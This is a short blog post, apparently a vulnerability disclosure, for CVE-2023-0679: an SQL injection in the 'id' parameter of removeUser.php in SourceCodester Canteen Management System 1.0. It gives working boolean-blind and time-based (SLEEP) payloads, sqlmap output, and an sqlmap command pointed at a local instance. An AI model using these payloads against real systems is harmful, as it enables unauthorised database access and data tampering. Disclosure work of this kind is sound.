Headline
CVE-2023-0679: SourceCodester Canteen Management System removeUser.php sql injection_@sec的博客-CSDN博客
A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file removeUser.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220220.
@sec 于 2023-02-06 17:16:27 发布 8 收藏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
SourceCodester Canteen Management System removeUser.php sql injection
url: youthappam/php_action/removeUser.php
Abstract:
Line 14 of removeUser.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.
In this case, the data is passed to query() in removeUser.php at line 14.
payload:
sqlmap identified the following injection point(s) with a total of 304 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (5974=5974) THEN 111 ELSE (SELECT 8956 UNION SELECT 5415) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=111 AND (SELECT 8669 FROM (SELECT(SLEEP(5)))iJMA)
sqlmap
sqlmap.py -u http://127.0.0.1/shenji/youthappam/youthappam/php_action/removeUser.php?id=111
Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html